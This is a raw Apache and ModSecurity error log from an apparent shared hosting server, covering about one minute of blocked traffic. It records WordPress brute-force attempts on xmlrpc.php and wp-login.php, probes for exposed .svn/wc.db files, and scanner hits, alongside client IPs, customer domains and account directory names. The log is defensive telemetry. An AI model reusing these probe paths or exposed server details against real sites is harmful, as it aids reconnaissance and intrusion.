[Tue May 26 12:50:09.450255 2026] [security2:error] [pid 448967:tid 449127] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJqeXLPuWQsfM-UVS3-QAAAB4"]
[Tue May 26 12:50:11.441656 2026] [autoindex:error] [pid 448967:tid 449102] [client 20.17.176.186:56878] AH01276: Cannot serve directory /home2/svijakqj/operatives.org.in/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 12:50:13.087803 2026] [security2:error] [pid 448967:tid 449182] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJrOXLPuWQsfM-UVS4WAAAAFU"]
[Tue May 26 12:50:13.702463 2026] [security2:error] [pid 448967:tid 449179] [client 178.20.43.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJreXLPuWQsfM-UVS4eQAAAFI"], referer: http://anujtradingco.com/homepages/shop-parallax/
[Tue May 26 12:50:13.730413 2026] [security2:error] [pid 448967:tid 449017] [remote 92.117.185.70:60518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVJreXLPuWQsfM-UVS4cwAAFjE"]
[Tue May 26 12:50:14.931564 2026] [security2:error] [pid 448967:tid 449121] [client 70.37.27.114:0] ModSecurity: Warning. Matched phrase "Claritybot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.yourstorybag.com"] [uri "/wp-content/cache/wp-rocket/www.yourstorybag.com/index-https.html_gzip"] [unique_id "ahVJruXLPuWQsfM-UVS4oAAAABg"]
[Tue May 26 12:50:14.932859 2026] [security2:error] [pid 448967:tid 449208] [client 70.37.27.114:31723] ModSecurity: Warning. Matched phrase "Claritybot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.yourstorybag.com"] [uri "/"] [unique_id "ahVJruXLPuWQsfM-UVS4ngAAAG8"]
[Tue May 26 12:50:15.459712 2026] [security2:error] [pid 448967:tid 449073] [remote 74.7.241.58:43640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVJr-XLPuWQsfM-UVS4rQAAK2k"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/sysinfo/tabs
[Tue May 26 12:50:15.764614 2026] [security2:error] [pid 448967:tid 449193] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJr-XLPuWQsfM-UVS4qQAAAGA"]
[Tue May 26 12:50:17.015477 2026] [security2:error] [pid 448967:tid 449143] [client 157.20.138.61:51592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJseXLPuWQsfM-UVS41wAAAC4"]
[Tue May 26 12:50:17.015594 2026] [security2:error] [pid 448967:tid 449143] [client 157.20.138.61:51592] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJseXLPuWQsfM-UVS41wAAAC4"]
[Tue May 26 12:50:18.908885 2026] [security2:error] [pid 448967:tid 449173] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJsuXLPuWQsfM-UVS4_wAAAEw"]
[Tue May 26 12:50:21.740936 2026] [security2:error] [pid 448967:tid 449099] [client 66.249.64.171:61683] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVJtOXLPuWQsfM-UVS5PgAAAAI"], referer: https://doyecpa.com/prizes/47689460
[Tue May 26 12:50:22.429259 2026] [security2:error] [pid 448967:tid 449172] [client 110.177.177.77:12616] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "obinnawrites.com"] [uri "/"] [unique_id "ahVJtuXLPuWQsfM-UVS5bAAAAEs"]
[Tue May 26 12:50:22.581606 2026] [security2:error] [pid 448967:tid 449163] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJtuXLPuWQsfM-UVS5YQAAAEI"]
[Tue May 26 12:50:24.078325 2026] [security2:error] [pid 448967:tid 449199] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJt-XLPuWQsfM-UVS5iQAAAGY"]
[Tue May 26 12:50:24.245739 2026] [autoindex:error] [pid 448967:tid 449154] [client 15.204.183.221:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://gldmarsa.com/
[Tue May 26 12:50:26.534449 2026] [autoindex:error] [pid 448967:tid 449204] [client 15.204.183.221:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://glorodbalsa.com/
[Tue May 26 12:50:26.561137 2026] [security2:error] [pid 448967:tid 449111] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJuuXLPuWQsfM-UVS5ygAAAA4"]
[Tue May 26 12:50:27.687460 2026] [security2:error] [pid 448967:tid 449187] [client 14.169.232.74:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJu-XLPuWQsfM-UVS56QAAAFo"]
[Tue May 26 12:50:28.691200 2026] [security2:error] [pid 448967:tid 449208] [client 157.20.138.61:51967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJvOXLPuWQsfM-UVS6DAAAAG8"]
[Tue May 26 12:50:28.691323 2026] [security2:error] [pid 448967:tid 449208] [client 157.20.138.61:51967] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJvOXLPuWQsfM-UVS6DAAAAG8"]
[Tue May 26 12:50:29.167695 2026] [security2:error] [pid 448967:tid 449172] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJvOXLPuWQsfM-UVS6FQAAAEs"]
[Tue May 26 12:50:30.365895 2026] [security2:error] [pid 448967:tid 448986] [remote 57.141.2.39:58099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVJvuXLPuWQsfM-UVS6QQAAZhI"]
[Tue May 26 12:50:32.914309 2026] [security2:error] [pid 448967:tid 449207] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJwOXLPuWQsfM-UVS6fgAAAG4"]
[Tue May 26 12:50:34.836167 2026] [security2:error] [pid 448967:tid 449170] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJwuXLPuWQsfM-UVS6ugAAAEk"]
[Tue May 26 12:50:37.766416 2026] [security2:error] [pid 448967:tid 449160] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJxeXLPuWQsfM-UVS7DwAAAD8"]
[Tue May 26 12:50:39.143303 2026] [security2:error] [pid 448967:tid 449197] [client 157.20.138.61:52328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJx-XLPuWQsfM-UVS7PAAAAGQ"]
[Tue May 26 12:50:39.143412 2026] [security2:error] [pid 448967:tid 449197] [client 157.20.138.61:52328] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJx-XLPuWQsfM-UVS7PAAAAGQ"]
[Tue May 26 12:50:39.867055 2026] [proxy:error] [pid 448967:tid 449183] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:50:39.867124 2026] [proxy_http:error] [pid 448967:tid 449183] [client 205.210.31.131:61018] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 12:50:39.867769 2026] [proxy:error] [pid 448967:tid 449183] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:50:39.867813 2026] [proxy_http:error] [pid 448967:tid 449183] [client 205.210.31.131:61018] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 12:50:41.193301 2026] [security2:error] [pid 448967:tid 449148] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJyOXLPuWQsfM-UVS7cQAAADM"]
[Tue May 26 12:50:43.512151 2026] [security2:error] [pid 448967:tid 449140] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJy-XLPuWQsfM-UVS7pAAAACs"]
[Tue May 26 12:50:43.857142 2026] [security2:error] [pid 448967:tid 449207] [client 139.180.224.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJy-XLPuWQsfM-UVS7uQAAAG4"], referer: https://anujtradingco.com
[Tue May 26 12:50:46.713504 2026] [security2:error] [pid 448967:tid 449195] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJzuXLPuWQsfM-UVS8LwAAAGI"]
[Tue May 26 12:50:48.807867 2026] [autoindex:error] [pid 448967:tid 449134] [client 185.217.125.16:55584] AH01276: Cannot serve directory /home1/moesartc/public_html/preetishah.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 12:50:49.439164 2026] [security2:error] [pid 448967:tid 449125] [client 85.208.96.206:30126] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/fun/list/"] [unique_id "ahVJ0eXLPuWQsfM-UVS8oAAAABw"]
[Tue May 26 12:50:49.439309 2026] [security2:error] [pid 448967:tid 449125] [client 85.208.96.206:30126] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/fun/list/"] [unique_id "ahVJ0eXLPuWQsfM-UVS8oAAAABw"]
[Tue May 26 12:50:49.533890 2026] [security2:error] [pid 448967:tid 449203] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ0eXLPuWQsfM-UVS8kgAAAGo"]
[Tue May 26 12:50:49.644724 2026] [security2:error] [pid 448967:tid 449114] [client 157.20.138.61:52687] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ0eXLPuWQsfM-UVS8qAAAABE"]
[Tue May 26 12:50:49.644875 2026] [security2:error] [pid 448967:tid 449114] [client 157.20.138.61:52687] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ0eXLPuWQsfM-UVS8qAAAABE"]
[Tue May 26 12:50:52.413029 2026] [security2:error] [pid 448967:tid 449151] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ0-XLPuWQsfM-UVS87gAAADY"]
[Tue May 26 12:50:54.030252 2026] [security2:error] [pid 448967:tid 449137] [client 184.189.77.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ1eXLPuWQsfM-UVS9HQAAACg"]
[Tue May 26 12:50:55.246584 2026] [security2:error] [pid 448967:tid 449135] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ1uXLPuWQsfM-UVS9RQAAACY"]
[Tue May 26 12:50:56.285569 2026] [security2:error] [pid 448967:tid 449203] [client 195.178.110.34:48038] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVJ2OXLPuWQsfM-UVS9ZAAAAGo"]
[Tue May 26 12:50:56.720911 2026] [autoindex:error] [pid 448967:tid 449150] [client 34.72.176.129:24883] AH01276: Cannot serve directory /home1/micro3e1/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:50:57.955238 2026] [security2:error] [pid 448967:tid 449144] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ2eXLPuWQsfM-UVS9gQAAAC8"]
[Tue May 26 12:50:59.322281 2026] [security2:error] [pid 448967:tid 449102] [client 195.178.110.34:48038] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/.svn/entries"] [unique_id "ahVJ2-XLPuWQsfM-UVS9sAAAAAU"]
[Tue May 26 12:51:00.176877 2026] [security2:error] [pid 448967:tid 449110] [client 157.20.138.61:53049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ3OXLPuWQsfM-UVS9wAAAAA0"]
[Tue May 26 12:51:00.177053 2026] [security2:error] [pid 448967:tid 449110] [client 157.20.138.61:53049] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ3OXLPuWQsfM-UVS9wAAAAA0"]
